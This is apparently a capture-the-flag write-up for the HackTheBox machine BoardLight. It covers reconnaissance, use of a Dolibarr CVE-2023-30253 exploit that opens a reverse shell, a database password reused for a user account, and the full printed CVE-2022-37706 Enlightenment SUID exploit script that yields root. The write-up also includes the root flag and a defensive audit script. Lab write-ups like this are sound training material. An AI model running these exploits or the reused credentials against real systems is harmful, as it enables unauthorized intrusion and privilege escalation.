BoardLight
BoardLight is an easy-difficulty machine. The initial website on port 80 reveals the domain board.htb, and fuzzing then finds the subdomain crm.board.htb, which hosts a Dolibarr ERP system vulnerable to the RCE CVE-2023-30253. The site's configuration file gives up the MySQL password, which is reused by the larissa user. Finally, an enlightenment-related SUID binary is found that is affected by the CVE-2022-37706 privilege escalation vulnerability, which can be exploited to obtain a root shell.
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# nmap 10.129.9.143 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-19 08:39 EST
Nmap scan report for 10.129.9.143
Host is up (0.073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# nmap 10.129.9.143 -p 22,80 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-19 08:39 EST
Nmap scan report for 10.129.9.143
Host is up (0.068s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
1.1.2. vhost
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://boardlight.htb/ -H "Host: FUZZ.boardlight.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://boardlight.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.boardlight.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 339 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# dirsearch -u boardlight.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/BoardLight/reports/_boardlight.htb/_25-12-19_08-42-44.txt
Target: http://boardlight.htb/
[08:42:45] Starting:
[08:42:46] 301 - 313B - /js -> http://boardlight.htb/js/
[08:42:52] 200 - 2KB - /about.php
[08:43:03] 200 - 2KB - /contact.php
[08:43:03] 301 - 314B - /css -> http://boardlight.htb/css/
[08:43:08] 301 - 317B - /images -> http://boardlight.htb/images/
Task Completed
1.2. web
There is a contact form, but submitting it just scrolls back to the top of the page. This is just a static site.
1.2.1. portfolio.php
A comment in the page source mentions a PHP file, portfolio.php.
Brute-force its parameters with arjun:
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# arjun -u http://boardlight.htb/portfolio.php
_
/_| _ '
( |/ /(//) v2.2.7
_/
[*] Scanning 0/1: http://boardlight.htb/portfolio.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[!] No parameters were discovered.
No parameters were found.
1.2.2. Domain
In the footer I noticed that the domain is not boardlight.htb but board.htb.
Update the hosts entry and run the subdomain brute-force again.
1.2.3. vhost brute
Using ffuf here:
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# sed -i 's/boardlight/board/' /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.9.143 -H "Host: FUZZ.board.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.9.143
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 601ms]
:: Progress: [19966/19966] :: Job [1/1] :: 547 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
This reveals the subdomain crm.board.htb.
1.2.4. dirsearch for crm.board.htb
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# dirsearch -u crm.board.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/BoardLight/reports/_crm.board.htb/_25-12-19_09-06-41.txt
Target: http://crm.board.htb/
[09:06:41] Starting:
[09:06:49] 301 - 314B - /admin -> http://crm.board.htb/admin/
[09:06:55] 301 - 312B - /api -> http://crm.board.htb/api/
[09:06:55] 200 - 108B - /api/
[09:06:58] 301 - 319B - /categories -> http://crm.board.htb/categories/
[09:07:00] 301 - 316B - /contact -> http://crm.board.htb/contact/
[09:07:00] 301 - 313B - /core -> http://crm.board.htb/core/
[09:07:00] 301 - 313B - /cron -> http://crm.board.htb/cron/
[09:07:03] 200 - 2KB - /favicon.ico
[09:07:04] 301 - 312B - /ftp -> http://crm.board.htb/ftp/
[09:07:06] 301 - 317B - /includes -> http://crm.board.htb/includes/
[09:07:07] 301 - 316B - /install -> http://crm.board.htb/install/
[09:07:07] 200 - 322B - /install/
[09:07:07] 200 - 322B - /install/index.php?upgrade/
[09:07:16] 301 - 316B - /product -> http://crm.board.htb/product/
[09:07:17] 301 - 315B - /public -> http://crm.board.htb/public/
[09:07:17] 302 - 0B - /public/ -> /public/error-404.php
[09:07:17] 301 - 317B - /resource -> http://crm.board.htb/resource/
[09:07:18] 200 - 105B - /robots.txt
[09:07:18] 200 - 176B - /security.txt
[09:07:21] 301 - 316B - /support -> http://crm.board.htb/support/
[09:07:21] 200 - 1KB - /support/
[09:07:23] 301 - 314B - /theme -> http://crm.board.htb/theme/
[09:07:24] 301 - 313B - /user -> http://crm.board.htb/user/
[09:07:24] 301 - 319B - /user/admin -> http://crm.board.htb/user/admin/
[09:07:27] 301 - 316B - /website -> http://crm.board.htb/website/
Task Completed
security.txt:
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# curl http://crm.board.htb/security.txt
# Security policies of Dolibarr ERP CRM project
Contact: mailto:security@dolibarr.org
Preferred-Languages: en
Policy: https://github.com/Dolibarr/dolibarr/security/policy
Expires: Sat, 31 Dec 2050 00:00:00 GMT
robots.txt:
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# curl http://crm.board.htb//robots.txt
User-agent: *
Allow: /public/agenda/agendaexport.php
Allow: /public/demo/
Allow: /public/members/new.php
Allow: /index.php
#Allow: /$
Disallow: /
1.3. CVE-2023-30253 Dolibarr RCE
http://crm.board.htb/
This is a Dolibarr 17.0.0 ERP.
However, CVE-2023-30253 is an authenticated RCE, so we need valid credentials first.
The default credentials admin / admin work here.
Once logged in, the account turns out to be a restricted user (despite being called admin),
but it has enough rights to run the exploit.
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─# python exploit.py http://crm.board.htb admin admin 10.10.14.74 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.74
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from boardlight~10.129.9.143-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/boardlight~10.129.9.143-Linux-x86_64/2025_12_19-09_27_17-237.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
www-data
2. larissa
2.1. recon
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:40753 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:34157 [::]:*
>>>> tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
>>>> tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
So MySQL is listening locally.
A quick grep finds the configuration file that holds the database settings:
www-data@boardlight:~/html/crm.board.htb/htdocs$ grep \'3306\' -r ./
./support/inc.php: $dolibarr_main_db_port = '3306'; // For backward compatibility
./install/mysql/data/llx_accounting_account_de.sql:INSERT INTO llx_accounting_account (entity, rowid, fk_pcg_version, pcg_type, account_number, account_parent, label) VALUES (__ENTITY__, 2247, 'SKR03', '3', '3306', '2240', 'Wareneingang 7% Vorsteuer');
./install/inc.php: $dolibarr_main_db_port = '3306'; // For backward compatibility
./conf/conf.php.old:// $dolibarr_main_db_host='3306';
./conf/conf.php.example:// $dolibarr_main_db_host='3306';
./conf/conf.php:$dolibarr_main_db_port='3306';
2.2. mysql
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
>>>> $dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
>>>> $dolibarr_main_db_user='dolibarrowner';
>>>> $dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -udolibarrowner -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 71
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> showdatabase;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'showdatabase' at line 1
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use dolibarr
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
showDatabase changed
mysql> show tables;
mysql> select * from llx_accounting_account ;
Empty set (0.00 sec)
mysql> select * from llx_accounting_account;
Empty set (0.00 sec)
mysql> select * from llx_user ;
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| rowid | entity | ref_employee | ref_ext | admin | employee | fk_establishment | datec | tms | fk_user_creat | fk_user_modif | login | pass_encoding | pass | pass_crypted | pass_temp | api_key | gender | civility | lastname | firstname | address | zip | town | fk_state | fk_country | birth | birth_place | job | office_phone | office_fax | user_mobile | personal_mobile | email | personal_email | signature | socialnetworks | fk_soc | fk_socpeople | fk_member | fk_user | fk_user_expense_validator | fk_user_holiday_validator | idpers1 | idpers2 | idpers3 | note_public | note_private | model_pdf | datelastlogin | datepreviouslogin | datelastpassvalidation | datestartvalidity | dateendvalidity | iplastlogin | ippreviouslogin | egroupware_id | ldap_sid | openid | statut | photo | lang | color | barcode | fk_barcode_type | accountancy_code | nb_holiday | thm | tjm | salary | salaryextra | dateemployment | dateemploymentend | weeklyhours | import_key | default_range | default_c_exp_tax_cat | national_registration_number | fk_warehouse |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| 1 | 0 | | NULL | 1 | 1 | 0 | 2024-05-13 13:21:56 | 2024-05-13 13:21:56 | NULL | NULL | dolibarr | NULL | NULL | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL | NULL | | | SuperAdmin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | null | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-15 09:57:04 | 2024-05-13 23:23:59 | NULL | NULL | NULL | 10.10.14.31 | 10.10.14.41 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
| 2 | 1 | | NULL | 0 | 1 | 0 | 2024-05-13 13:24:01 | 2024-05-15 09:58:40 | NULL | NULL | admin | NULL | NULL | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | NULL | yr6V3pXd9QEI | NULL | | admin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | [] | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2025-12-19 06:27:07 | 2025-12-19 06:24:29 | NULL | NULL | NULL | 10.10.14.74 | 10.10.14.74 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
2 rows in set (0.01 sec)
mysql>
These are 10-round bcrypt hashes, and I don't think they can be cracked,
so first let's check whether the database password is reused:
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
Password:
larissa@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ whoami
larissa
3. Root
Look for privilege escalation vectors:
larissa@boardlight:~$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.
Run linPEAS.
This is a 2024 machine, so it most likely does not have that 2021 vulnerability.
3.1. enlightenment CVE-2022-37706-LPE
Check the SUID binaries:
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
There is an enlightenment binary, and a quick search shows that it is affected by CVE-2022-37706.
exp: [Enlightenment v0.25.3 - Privilege escalation - Linux local Exploit](https://www.exploit-db.com/exploits/51180), [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
Cloning into 'CVE-2022-37706-LPE-exploit'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (92/92), done.
remote: Compressing objects: 100% (92/92), done.
remote: Total 92 (delta 32), reused 14 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (92/92), 498.76 KiB | 257.00 KiB/s, done.
Resolving deltas: 100% (32/32), done.
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# cd CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# ls
exploit.sh PublicReferenceURL.txt README.md screenshots
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# cat exploit.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~$ bash exp.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# ls /root
root.txt snap
# cat /root/root.txt
d05f6b6990676adcdcd16e393881ca11
4. Beyond Root
4.1. Why www-data cannot exploit CVE-2022-37706
Because the www-data user is not in any of the groups that enlightenment_sys trusts (such as adm or plugdev), it is not allowed to invoke /bin/mount through it.
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
To confirm this I created a new user, c1trus,
whose id output is uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus):
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
>>>> ERROR: ACTION NOT ALLOWED: /bin/mount
Then I add it to the adm or plugdev group:
root@boardlight:/tmp# usermod -aG plugdev c1trus
root@boardlight:/tmp# su c1trus
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus),46(plugdev)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# exit
root@boardlight:/tmp# usermod -aG adm c1trus
root@boardlight:/tmp# su c1trus
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus),4(adm)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1005(c1trus)
Conversely, if I remove larissa from the adm group, that user can no longer use /bin/mount through enlightenment_sys either:
root@boardlight:/tmp# gpasswd -d larissa adm
Removing user larissa from group adm
root@boardlight:/tmp# su larissa
larissa@boardlight:/tmp$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa)
larissa@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
1.sh: line 20: /tmp/exploit: Permission denied
chmod: changing permissions of '/tmp/exploit': Operation not permitted
[+] Enjoy the root shell :)
ERROR: ACTION NOT ALLOWED: /bin/mount
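The group check above is what decides who can reach the vulnerable mount action, so a defender's audit should answer two questions: is the root-SUID enlightenment_sys present, and which accounts sit in a trusted group? The following script is an added example, not part of this writeup or of the Enlightenment project. It assumes, as the writeup shows, that adm and plugdev are the trusted groups, and it runs against constructed /etc/group and /etc/passwd samples that mirror the ids seen on the box.

```python
# Audit helper (added example): report accounts that can reach the
# enlightenment_sys mount action via group membership, and check whether
# the helper is installed as a root-owned SUID binary.
import os
import stat
from typing import Dict, List, Tuple

# Groups shown as sufficient in the writeup. Assumption: no others matter
# on this build; extend the tuple if your enlightenment_sys trusts more.
TRUSTED_GROUPS: Tuple[str, ...] = ("adm", "plugdev")

# Path taken from the SUID listing in the writeup.
ENLIGHTENMENT_SYS = "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys"

# Constructed samples (not real dumps) mirroring the uids/gids on the box.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,larissa
plugdev:x:46:
www-data:x:33:
larissa:x:1000:
c1trus:x:1005:
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
larissa:x:1000:1000:larissa:/home/larissa:/bin/bash
c1trus:x:1005:1005::/home/c1trus:/bin/bash
"""


def parse_group(text: str) -> Dict[str, Tuple[str, List[str]]]:
    """Map group name -> (gid, [secondary members]) from /etc/group content."""
    groups: Dict[str, Tuple[str, List[str]]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (gid, [m for m in members.split(",") if m])
    return groups


def exposed_users(group_text: str, passwd_text: str,
                  trusted: Tuple[str, ...] = TRUSTED_GROUPS) -> Dict[str, List[str]]:
    """Return {user: [reasons]} for every account in a trusted group.

    Both the primary gid from /etc/passwd and secondary membership from
    /etc/group count, since both show up in the process's group list."""
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _members) in groups.items()}
    exposed: Dict[str, List[str]] = {}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _pw, _uid, gid = line.split(":", 4)[:4]
        reasons: List[str] = []
        primary = gid_to_name.get(gid)
        if primary in trusted:
            reasons.append(f"primary group {primary}")
        for g in trusted:
            if user in groups.get(g, ("", []))[1]:
                reasons.append(f"member of {g}")
        if reasons:
            exposed[user] = reasons
    return exposed


def is_root_suid(mode: int, owner_uid: int) -> bool:
    """True when the set-uid bit is set and the file is owned by root."""
    return owner_uid == 0 and bool(mode & stat.S_ISUID)


def audit_binary(path: str = ENLIGHTENMENT_SYS) -> Dict[str, object]:
    """Inspect the live filesystem and return a report; makes no changes."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"path": path, "present": False, "root_suid": False}
    return {
        "path": path,
        "present": True,
        "root_suid": is_root_suid(st.st_mode, st.st_uid),
        # Dropping the SUID bit is the stop-gap; the real fix is a patched release.
        "remediation": f"chmod u-s {path}  # or upgrade Enlightenment to a fixed release",
    }


if __name__ == "__main__":
    for user, why in exposed_users(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{user}: {', '.join(why)}")
    print(audit_binary())
```

On a real host, replace the sample strings with the contents of /etc/group and /etc/passwd; larissa shows up because of adm, while www-data and the fresh c1trus account do not, matching the behaviour observed above.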
4.2. Credentials
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
crm.board.htb backend: admin admin
User: larissa serverfun2$2023!!